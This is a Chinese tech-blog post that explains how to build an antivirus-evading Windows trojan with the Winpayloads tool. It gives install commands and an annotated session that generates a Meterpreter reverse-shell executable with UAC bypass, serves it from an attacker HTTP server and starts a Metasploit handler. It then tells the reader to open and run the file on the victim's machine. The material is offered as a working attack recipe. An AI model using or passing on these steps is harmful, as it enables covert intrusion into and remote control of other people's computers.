专栏首页bboysoul制作免杀windows木马(Winpayloads )

制作免杀windows木马(Winpayloads )

工具链接

https://github.com/nccgroup/Winpayloads

简介

Winpayloads 是一款制作免杀windows木马的工具

安装

下载 git clone https://github.com/nccgroup/Winpayloads.git cd Winpayloads 安装 chmod +x setup.sh ./setup.sh 安装完后启动的样子

                                                                                                          _       ___       ____              __                __
                                                                                                         | |     / (_)___  / __ \____ ___  __/ /___  ____ _____/ /____
                                                                                                         | | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __  / ___/
                                                                                                         | |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__  )
                                                                                                         |__/|__/_/_/ /_/_/    \__,_/\__, /_/\____/\__,_/\__,_/____/
                                                                                                                                    /____/NCCGroup - CharlieDean
===================================================================================================================================Main Menu==================================================================================================================================
                                                                                                  1: Windows Reverse Shell                                                                                                  
                                                                                                  2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]                                                                                                 
                                                                                                  3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]                                                                                                  
                                                                                                  4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]                                                                                                 
                                                                                                  5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]                                                                                                 
                                                                                                  ps: PowerShell Menu                                                                                                 
                                                                                                  stager: Powershell Interpreter Stager                                                                                                 
                                                                                                  clients: Connected Interpreter Clients
                                                                                                 
                                                                                                  ?: Print Detailed Help                                                                                                  
                                                                                                  back: Main Menu                                                                                                 
                                                                                                  exit: Exit                                                                                                  
==============================================================================================================================================================================================================================================================================
Main Menu > 

使用

比如你要生成一个Windows Meterpreter Reverse Shell

Main Menu > 2

[*] Press Enter For Default Port(4444)
[*] Port> 4444

[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP> 
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444

[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
- Genera              
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe

[*] Upload To Local Websever or (p)sexec? [y]/p/n: y

[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v4.14.27-dev                         ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post        ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Starting the payload handler...
msf exploit(handler) > 

在受害者机器上打开 http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe,之后运行就可以了

评价

其实不能做到完全免杀,可能是因为工具出来太久的缘故,但是生成木马的方式还是挺简单的值得一试

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 1485: C语言实验题――整除

    描述:判断一个数n能否同时被3和5整除。 输入:输入一个正整数n。 输出:如果能够同时被3和5整除,输出Yes,否则输出No。 样例输入:15 样例输出...

    bboysoul
  • 解决树莓派的gpio口不能读取ds18b20的设备文件

    做了一个树莓派的温度检测装置,反正就是用ds18b20来传感器来检测温度这样子,不过树莓派最新的固件貌似不能读取ds18b20的设备文件

    bboysoul
  • ASCII码表

    ASCII(American Standard Code for Information Interchange,美国信息交换标准代码)是基于拉丁字母的一套电脑...

    bboysoul
  • 详谈WordPress 360&百度搜索引擎展现出图策略

    博客一直佛系seo,不过还好一直稳步提升。随着权重稳定,在百度的出图率也提升了很多。今天就来聊一聊百度收录提交和搜索引擎出图的个人部分见解。区别于百度出图佛系,...

    AlexTao
  • node.js中的nodemon详解及安装方法

    nodemon是一种工具,可在检测到目录中的文件更改时通过自动重新启动节点应用程序来帮助开发基于node.js的应用程序。

    逍遥灰灰
  • 几个作品

    3.拥有置于前台的服务,实现Notification的播放、暂停按钮与其他界面同步。

    爱因斯坦福
  • python unix时间戳与正常时间转

    py3study
  • 手机删除的照片怎么找回?最好用找回的方法

      手机删除的照片怎么找回?前段时间出去游玩的时候拍了很多照片,当时拍的时候没有去整理,后来在家里整理的时候却不小心删除了一些照片,有些都是一些比较稀有的照片,...

    科技第六人
  • 千兆以太网(2):接收——包校验和数据筛选

    前面我们实现了FPGA板卡接收以太网的数据,但是里面的数据比较乱,而且可能出现无效帧,即便是有效帧,也不是所有数据都是我们要的,必须对数据进行筛选。本篇博客详细...

    FPGA开源工作室
  • 妈妈不在身边的第X个母亲节,用AI找回她的美好时光

    出门在外,是不是才觉得妈妈的唠叨分外可爱又令人怀念。母亲节到了,翻箱倒柜想找出一张妈妈的老照片,却因为早已泛黄褪色而触碰不到回忆的信号,记不得哪年哪月哪天,找不...

    大数据文摘

扫码关注云+社区

领取腾讯云代金券